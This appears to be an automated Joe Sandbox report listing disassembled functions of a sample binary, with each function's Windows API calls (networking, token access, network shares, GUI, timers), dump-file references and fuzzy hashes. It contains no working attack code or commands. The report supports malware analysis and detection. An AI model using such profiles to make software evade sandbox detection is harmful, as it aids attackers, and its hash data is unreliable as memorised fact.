Part of subcall function 0064182D: InternetCloseHandle.WININET(00000000), ref: 006418E9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 5252346f4334cd9e40d187743c106c3897d1845a65261780f197fd97df25e4df
Instruction ID: 27b4aa60d96d837d69a36c0a4de1293d6b7f7361d79aeed8a82c93570948a60c
Opcode Fuzzy Hash: 5252346f4334cd9e40d187743c106c3897d1845a65261780f197fd97df25e4df
Instruction Fuzzy Hash: 98219F35200605BFEB129F60DC01FBABBEBFF4A711F10402EFA519A650DB71D85197A4

Function 00633A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0065FAC0), ref: 00633A64
GetLastError.KERNEL32 ref: 00633A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00633A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0065FAC0), ref: 00633ADF

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: ed225d22c3fa8ab5c2fd8d9550a0f528caa2f64c594efe5707de9bc76709f2d0
Instruction ID: 53040ba7064819bc32b19bc414d3f3f8f9b4b10b17d0621d19cbf5b7deef8428
Opcode Fuzzy Hash: ed225d22c3fa8ab5c2fd8d9550a0f528caa2f64c594efe5707de9bc76709f2d0
Instruction Fuzzy Hash: B52186745083159F8310DF28C8858AABBE5FF59364F104A1EF499C73A1E731DE46CB82

Function 006050E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00605101

Part of subcall function 005F571C: __FF_MSGBANNER.LIBCMT ref: 005F5733
Part of subcall function 005F571C: __NMSG_WRITE.LIBCMT ref: 005F573A
Part of subcall function 005F571C: RtlAllocateHeap.NTDLL(00EA0000,00000000,00000001,00000000,?,?,?,005F0DD3,?), ref: 005F575F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5be129d24233ba5063e6d3e83030984444167cebb2d8e8fd83f4560b4f5cf382
Instruction ID: 0432bf74c194243ceb8b3331007790ace86f42670299b9455cf917fd5a12367e
Opcode Fuzzy Hash: 5be129d24233ba5063e6d3e83030984444167cebb2d8e8fd83f4560b4f5cf382
Instruction Fuzzy Hash: 08110A71544A1AAEDF352F70AC0D7BF3B9AAF40361F10096AFA46962D0DE3489418B90

Function 005D44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005D44CF

Part of subcall function 005D407C: _memset.LIBCMT ref: 005D40FC
Part of subcall function 005D407C: _wcscpy.LIBCMT ref: 005D4150
Part of subcall function 005D407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005D4160

KillTimer.USER32(?,00000001,?,?), ref: 005D4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005D4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0060D4B9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: bf9a33d99c7ff60a44dce917b8198429d6ee4668e2ef1505366fffdbfe65e795
Instruction ID: 04a3a1747a3d2c85bea672f73bdfd152799254b42acc1820c0ddec767a8ff58b
Opcode Fuzzy Hash: bf9a33d99c7ff60a44dce917b8198429d6ee4668e2ef1505366fffdbfe65e795
Instruction Fuzzy Hash: 8A21F270944784AFE732CB689859BEBBFEDAB05304F04049FE78E56282C3742A84CB41

Function 00646369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00637896,?,?,00000000), ref: 005D5A2C
Part of subcall function 005D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00637896,?,?,00000000,?,?), ref: 005D5A50

gethostbyname.WSOCK32(?,?,?), ref: 00646399
WSAGetLastError.WSOCK32(00000000), ref: 006463A4
_memmove.LIBCMT ref: 006463D1
inet_ntoa.WSOCK32(?), ref: 006463DC

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 44c46845e42f5c9477902df2c029002829eb643e8ab2390c1dbd71feb0b5269c
Instruction ID: 68aaa6b7f717783c50fc6e736a3ea393b1e775c5230a0b5d2eafc99f94061185
Opcode Fuzzy Hash: 44c46845e42f5c9477902df2c029002829eb643e8ab2390c1dbd71feb0b5269c
Instruction Fuzzy Hash: C911823650010AAFCB10FFA8DD4ACEEBBB9BF45311B144066F506A7261EB30AE04DB61

Function 00628B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00628B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00628B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00628B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00628BA4

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ed36139bb464296789f363ae559bd87114307b135c6e194a8dfbdb6940c55857
Instruction ID: 3a728af23d9b5d3bbb49559af74d7dd46c3584e7b185b8890e708fa768ffc3ad
Opcode Fuzzy Hash: ed36139bb464296789f363ae559bd87114307b135c6e194a8dfbdb6940c55857
Instruction Fuzzy Hash: 21111C79901218FFDB11DF95CC85F9DBBB5FB48710F204095E900B7290DA716E11DB94

Function 005D1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

DefDlgProcW.USER32(?,00000020,?), ref: 005D12D8
GetClientRect.USER32(?,?), ref: 0060B5FB
GetCursorPos.USER32(?), ref: 0060B605
ScreenToClient.USER32(?,?), ref: 0060B610

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 07db32fc309ea385178c6952a91a5c21c63900e9f46a5204659c1275c909455e
Instruction ID: 6a056b466d3cab23638ab953c15db337b1222865890e29f122e605146d370030
Opcode Fuzzy Hash: 07db32fc309ea385178c6952a91a5c21c63900e9f46a5204659c1275c909455e
Instruction Fuzzy Hash: 9C116A3950051AFFCB20EF99D8899EE7BBAFB45301F000457FA01E7240D731BA518BA9

Function 0062D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0062D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0062D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0062D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0062D897

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: b89883f1c1e39781273819e69a44a07c3aa566a632833514d5492407489544e0
Instruction ID: b7a581eeec33c936a16be453a186ee6f2a99396b5868d34a72f0244ad909e61c
Opcode Fuzzy Hash: b89883f1c1e39781273819e69a44a07c3aa566a632833514d5492407489544e0
Instruction Fuzzy Hash: 0A115E75605724DBE320CF50EC08F93BBFDEB00B00F108569E656D6191D7B4E5499FA1

Function 00606FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00606FDB

Part of subcall function 006076C2: __fltout2.LIBCMT ref: 006076EB

__cftog_l.LIBCMT ref: 00607001
__cftoe_l.LIBCMT ref: 00607033

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 308f5796f6edd3cc8b7a2eb2c5824feda2b7bf6cb4c9581e9653d3df9930ffc3
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: D201807288414EBBCF1A5F84CC01CEE3F67BB18354F488515FE19581B0D236E9B2AB81

Function 0065B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0065B2E4
ScreenToClient.USER32(?,?), ref: 0065B2FC
ScreenToClient.USER32(?,?), ref: 0065B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0065B33B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 8f7f5f9615dadbf0b646ce96352c810b46f2b75d6f157a94679dee708484a591
Instruction ID: 5463571523ff32de8225af5c2035863145f4495b0c0695712f71b64ec401720c
Opcode Fuzzy Hash: 8f7f5f9615dadbf0b646ce96352c810b46f2b75d6f157a94679dee708484a591
Instruction Fuzzy Hash: 191144B9D00209EFDB41CFA9C8849EEBBF9FF08311F109166E914E3220D735AA558F50

Function 00636BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00636BE6

Part of subcall function 006376C4: _memset.LIBCMT ref: 006376F9

_memmove.LIBCMT ref: 00636C09
_memset.LIBCMT ref: 00636C16
LeaveCriticalSection.KERNEL32(?), ref: 00636C26

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 505ee49f3d1c92fe295dd1e31830d92cbcff9217417b2882a9294b26700e3947
Instruction ID: 54da2df90b99829539990f441a59c4d62bebba354f7d52545f5e76a8a2685f2a
Opcode Fuzzy Hash: 505ee49f3d1c92fe295dd1e31830d92cbcff9217417b2882a9294b26700e3947
Instruction Fuzzy Hash: 16F0547A100204ABCF416F95DC85A8ABF2AEF45361F048065FE095F267CB35E911CBB4

Function 005D2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 005D2231
SetTextColor.GDI32(?,000000FF), ref: 005D223B
SetBkMode.GDI32(?,00000001), ref: 005D2250
GetStockObject.GDI32(00000005), ref: 005D2258
GetWindowDC.USER32(?,00000000), ref: 0060BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0060BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0060BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0060BEC2
GetPixel.GDI32(00000000,?,?), ref: 0060BEE2
ReleaseDC.USER32(?,00000000), ref: 0060BEED

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 75325494d0825ce55565be460591e81ebc0a20295e207a715761116335d8610a
Instruction ID: ecc9c48e99c98ed9539dd1129ca1fb21f78daf6942d7d3e1f8f7b523dd123170
Opcode Fuzzy Hash: 75325494d0825ce55565be460591e81ebc0a20295e207a715761116335d8610a
Instruction Fuzzy Hash: 36E03932144644AADB219F68EC0DBD93F12EB25332F009366FA69580E187724980DB12

Function 00628712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0062871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,006282E6), ref: 00628722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006282E6), ref: 0062872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,006282E6), ref: 00628736

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 2d5cdf8fe5bb580d8cf0ca6b63e3f68b9231a972dfd16d87035ce318c7328302
Instruction ID: bc91482a704f208e56dd3de7fa71859ac6a30ba766fcdf270dcd6674f80947ab
Opcode Fuzzy Hash: 2d5cdf8fe5bb580d8cf0ca6b63e3f68b9231a972dfd16d87035ce318c7328302
Instruction Fuzzy Hash: 2FE086766123219FD7609FB06D0CF9B3BBEEF60793F144828B245CA0C0DA348441CB50

Function 005D6240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%f, xrefs: 005D624E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID: %f
API String ID: 0-2819850262
Opcode ID: 53fe6a56d7dc17bc7f4ad79c13a0f4115ed162a7df6fdae5e9e2761e88b79eb3
Instruction ID: 2d0e559b3da2783a354c07bb42655416111ce964a0c4b4621aa8743ec561c65b
Opcode Fuzzy Hash: 53fe6a56d7dc17bc7f4ad79c13a0f4115ed162a7df6fdae5e9e2761e88b79eb3
Instruction Fuzzy Hash: 1CB17C7590010A9ACF34EB9CC4859EEBFB9FF58310F544527E912A7391EB349A82CB91

Function 0064AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0064AFAE

Strings

xbi, xrefs: 0064B010
xbi, xrefs: 0064AFE4

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __itow_s
String ID: xbi$xbi
API String ID: 3653519197-2246191879
Opcode ID: 136272e6cfb9932fee6fe8477a29a9a7fbe8a94c384145b541dd1db4268fd914
Instruction ID: da8433efdbaa30f37709bf92c3f245903976b75cd474861d9ad19cc5ef8a9bf0
Opcode Fuzzy Hash: 136272e6cfb9932fee6fe8477a29a9a7fbe8a94c384145b541dd1db4268fd914
Instruction Fuzzy Hash: CAB15F70A0020AABCB24DF58C895EFABBBAFF59300F14845AF9459B351EB71E945CB50

Function 0063AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 005EFC86: _wcscpy.LIBCMT ref: 005EFCA9

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

__wcsnicmp.LIBCMT ref: 0063B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0063B0F6

Strings

LPT, xrefs: 0063B027

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 98a031141796bffcbd9b6af65018ad815fc8db404d94f7b82cfa3d1b06f76560
Instruction ID: 45c638b2837f26b63388beebf736f425eac1e590bae02585512ee9fdecf845ef
Opcode Fuzzy Hash: 98a031141796bffcbd9b6af65018ad815fc8db404d94f7b82cfa3d1b06f76560
Instruction Fuzzy Hash: 08618071E00219AFCB18DF98C895EEEB7B5FB48710F10505AFA16AB391D770AE40CB90

Function 005E2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 005E2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 005E2981

Strings

@, xrefs: 005E2975

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: d07fc0a9e0788ff996f5d76977d55737edbf3e835d8f8dfbeb5406c8a1699fe9
Instruction ID: 1f1bd7e39858e854f25ca4d946b20ecf057baa14400a20941ba72904e8d31e3e
Opcode Fuzzy Hash: d07fc0a9e0788ff996f5d76977d55737edbf3e835d8f8dfbeb5406c8a1699fe9
Instruction Fuzzy Hash: 675125724187459BD320EF14D88ABABBBECFBC5344F41885EF2D8811A1DF318569CB66

Function 00639734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 005D4F0B: __fread_nolock.LIBCMT ref: 005D4F29

_wcscmp.LIBCMT ref: 00639824
_wcscmp.LIBCMT ref: 00639837

Strings

FILE, xrefs: 00639770

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: da32626dd8e3bd38dc9dbe2473724781961ed9e0238c5f5668718ab575861b6c
Instruction ID: c2bb7d3171038985a463b80a58cc5e18cedfcf4ded717fc06ce1a242aa2d20e9
Opcode Fuzzy Hash: da32626dd8e3bd38dc9dbe2473724781961ed9e0238c5f5668718ab575861b6c
Instruction Fuzzy Hash: BF41A971A0020ABBDF209BA4CC49FEF7BBEEFC5710F00046AF504A7291D67199458FA1

